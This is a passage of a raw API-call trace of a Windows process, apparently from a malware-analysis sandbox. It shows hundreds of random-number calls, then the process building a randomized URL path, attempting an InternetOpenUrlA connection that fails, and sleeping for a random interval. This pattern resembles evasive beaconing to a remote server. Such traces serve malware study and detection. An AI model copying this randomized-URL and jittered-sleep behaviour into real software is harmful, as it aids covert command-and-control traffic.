[0230.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0230.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fa9, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a16fa9) returned 0x0 [0230.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0230.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0230.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0230.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0230.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fc3, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a16fc3) returned 0x0 [0230.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0230.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.537] GetProcessHeap () returned 0x440000 [0230.537] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473da0 [0230.538] lstrcpyA (in: lpString1=0x473da0, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0230.538] lstrcatA (in: lpString1="\x81\x03", lpString2="/6m9izk8twm1dmoppMeupppvv2jdx2galp7no9mg/c9I9itAwZszpOxjq0ViumsDcd/EfpKmJgd9vbcuaaXfqnU3pbu79jmqusckka9ff/" | out: lpString1="\x81\x03/6m9izk8twm1dmoppMeupppvv2jdx2galp7no9mg/c9I9itAwZszpOxjq0ViumsDcd/EfpKmJgd9vbcuaaXfqnU3pbu79jmqusckka9ff/") returned="\x81\x03/6m9izk8twm1dmoppMeupppvv2jdx2galp7no9mg/c9I9itAwZszpOxjq0ViumsDcd/EfpKmJgd9vbcuaaXfqnU3pbu79jmqusckka9ff/" [0230.538] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0230.538] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/6m9izk8twm1dmoppMeupppvv2jdx2galp7no9mg/c9I9itAwZszpOxjq0ViumsDcd/EfpKmJgd9vbcuaaXfqnU3pbu79jmqusckka9ff/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0230.538] GetProcessHeap () returned 0x440000 [0230.538] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473da0 | out: hHeap=0x440000) returned 1 [0230.538] GetProcessHeap () returned 0x440000 [0230.538] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16f80 | out: hHeap=0x440000) returned 1 [0230.539] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0230.539] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0230.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0230.540] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0230.540] Sleep (dwMilliseconds=0x1c217) [0230.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0230.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0230.785] GetProcessHeap () returned 0x440000 [0230.785] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a03050 [0230.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0230.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a03051, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a03051) returned 0x0 [0230.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0230.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a03064, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a03064) returned 0x0 [0230.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0230.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0230.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0230.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0230.793] GetProcAddress 